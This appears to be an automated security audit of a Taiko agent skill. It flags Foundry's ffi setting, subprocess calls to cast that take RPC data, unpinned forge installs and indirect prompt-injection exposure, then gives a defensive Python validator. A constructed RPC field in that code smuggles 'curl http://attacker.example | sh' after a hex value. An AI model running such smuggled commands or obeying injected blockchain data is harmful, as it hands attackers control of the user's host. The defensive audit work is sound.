skills/taikoxyz/taiko-ai/taiko/Gen Agent Trust Hub

taiko

Warn

Audited by Gen Agent Trust Hub on Feb 28, 2026

Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The foundry.toml in the project template sets ffi = true. This enables the Foundry vm.ffi cheatcode, which lets any Solidity test or script run arbitrary shell commands on the host with the privileges of the user running forge; the commands execute outside the EVM sandbox entirely. The same capability can also be switched on per invocation with forge's --ffi flag, so the config file is not the only place to check.
  • [COMMAND_EXECUTION]: The Python utility scripts calc_blockhash.py and verify_signal.py use the subprocess module to run the cast CLI. Values taken from network (RPC) responses become arguments of a spawned process, so the safety of this pattern rests entirely on how strictly those values are validated before use.
  • [EXTERNAL_DOWNLOADS]: The skill's project template and instructions direct the user to fetch third-party code from GitHub (foundry-rs/forge-std, OpenZeppelin/openzeppelin-contracts) with forge install. forge install adds the repositories as git submodules; pinning a tag or commit (forge install owner/repo@tag) rather than the default branch keeps the fetched code reproducible.
  • [PROMPT_INJECTION]: The skill is exposed to indirect prompt injection:
    1. Ingestion points: external RPC responses read by calc_blockhash.py and verify_signal.py.
    2. Boundary markers: absent; nothing separates fetched data from instructions.
    3. Capability inventory: subprocess calls in the Python scripts and ffi enabled in foundry.toml.
    4. Sanitization: present (hex validation of the values passed to subprocess).
    Ingesting external data alongside command-execution capabilities creates a surface where malicious blockchain data could try to steer system-level agent operations; the hex validation is the control that currently keeps that data from reaching a shell.
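The two checks a reviewer would want for the findings above, as an added example that is not the skill's own code: a scan of a foundry.toml for ffi = true across profiles, and a strict validator that gates RPC-derived values before they become cast arguments (list-form argv, no shell). The foundry.toml text, the RPC result, and the function names are constructed for illustration; cast is never invoked by the test functions, since it may not be installed.

```python
"""Added example (not from the audited skill): detect ffi = true in a
foundry.toml, and validate RPC-derived values before passing them to cast."""
import re
import subprocess
from typing import Optional

# Constructed foundry.toml standing in for the template's file.
SAMPLE_FOUNDRY_TOML = """
[profile.default]
src = "src"
out = "out"
ffi = true          # the setting flagged by the audit

[profile.ci]
ffi = false
"""

_SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
_FFI_RE = re.compile(r"^\s*ffi\s*=\s*(true|false)\b")


def ffi_enabled_profiles(toml_text: str) -> list:
    """Return the [section] names that set ffi = true.

    Line-based on purpose: it needs no TOML library and matches the flat
    key/value layout foundry.toml uses. Inline '#' comments are stripped.
    Caveat: this does not see the --ffi flag passed on the command line.
    """
    section, found = "", []
    for raw in toml_text.splitlines():
        line = raw.split("#", 1)[0]
        m = _SECTION_RE.match(line)
        if m:
            section = m.group(1).strip()
            continue
        m = _FFI_RE.match(line)
        if m and m.group(1) == "true":
            found.append(section)
    return found


_HEX_RE = re.compile(r"0x[0-9a-fA-F]+")


def validate_hex(value, nbytes: Optional[int] = None) -> str:
    """Accept only a 0x-prefixed hex string, optionally of exactly nbytes.

    fullmatch means no whitespace, ';', '$(...)' or trailing newline can
    survive, and the 0x prefix means the value can never begin with '-'
    and be parsed by cast as an option.
    """
    if not isinstance(value, str) or not _HEX_RE.fullmatch(value):
        raise ValueError(f"not a hex string: {value!r}")
    if nbytes is not None and len(value) != 2 + 2 * nbytes:
        raise ValueError(f"expected {nbytes} bytes, got {value!r}")
    return value.lower()


def build_cast_argv(subcommand: str, *hex_args: str) -> list:
    """Build a cast argv list; every positional passes validate_hex first.

    The list form is handed to subprocess without shell=True, so no shell
    ever interprets the values.
    """
    if not re.fullmatch(r"[a-z][a-z0-9-]*", subcommand):
        raise ValueError(f"unexpected cast subcommand: {subcommand!r}")
    return ["cast", subcommand, *(validate_hex(a) for a in hex_args)]


def run_cast(argv: list, timeout: float = 30.0) -> str:
    """Execute a prepared argv (shell=False). Not exercised by the tests."""
    if argv[:1] != ["cast"]:
        raise ValueError("argv must come from build_cast_argv")
    proc = subprocess.run(argv, capture_output=True, text=True,
                          check=True, timeout=timeout)
    return proc.stdout.strip()


# Constructed stand-in for an eth_getBlockByNumber result from an
# untrusted RPC endpoint: two honest fields and one hostile one.
SAMPLE_RPC_RESULT = {
    "number": "0x1a4",
    "hash": "0x" + "ab" * 32,
    "extraData": "0x00; curl http://attacker.example | sh",
}


def safe_block_argv(rpc_result: dict) -> list:
    """The shape a calc_blockhash-style helper should take: validate, then build argv."""
    validate_hex(rpc_result["hash"], nbytes=32)      # sanity-check the hash length
    return build_cast_argv("block", rpc_result["number"])


def rejects(value) -> bool:
    """True if validate_hex refuses the value."""
    try:
        validate_hex(value)
    except ValueError:
        return True
    return False
```

The foundry.toml scan is deliberately conservative: it reports every profile with ffi = true so that a default profile left enabled is caught even when a CI profile disables it. The validator is the same idea as the hex check the audit found present in the scripts, stated as a reusable gate: anything that is not plain 0x-hex is refused before subprocess sees it.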
Audit Metadata
Risk Level: MEDIUM
Analyzed: Feb 28, 2026, 05:19 PM